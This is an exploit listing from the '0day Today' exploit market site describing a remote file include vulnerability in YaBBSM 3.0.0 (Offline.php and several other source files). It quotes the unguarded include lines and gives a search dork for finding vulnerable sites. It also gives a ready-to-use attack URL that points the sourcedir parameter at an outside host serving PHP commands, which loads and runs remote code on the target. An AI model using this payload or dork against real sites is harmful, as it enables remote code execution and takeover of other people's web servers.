[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability

Author
SilenZ
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-990
Category
web applications
Date add
12-10-2006
Platform
unsorted
============================================================
YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability
============================================================



[DESCRIPTION] Remote file include vuln found by sZ [oct 09, 2006]
[SOFTWARE]    Supermod 3.0 for yabb
[VENDOR URL]  http://www.supermod.org
[DORK]        YaBBSM V2.5.0 // Powered by YaBBSM V2.5.0 Based on YABB SE
[NOTES]       greetz to: neo-vortex, icez, Solano College CIS students.
 

VULN:
Offline.php
include("$sourcedir/pclzip.lib.php");
They forgot to include settings.php, this file seems to not exist sometimes.
 
VULN:
Sources/Admin.php
include_once("$sourcedir/Recent.php");
 
VULN:
Sources/Offline.php
include_once("$sourcedir/Recent.php");
 
VULN:
content/portalshow.php
include_once "$sourcedir/Calendar.php";
 
[EXAMPLE] http://site.com/community/Offline.php?sourcedir=http://shellurl.com/phpcommands.txt?




#  0day.today [2024-11-15]  #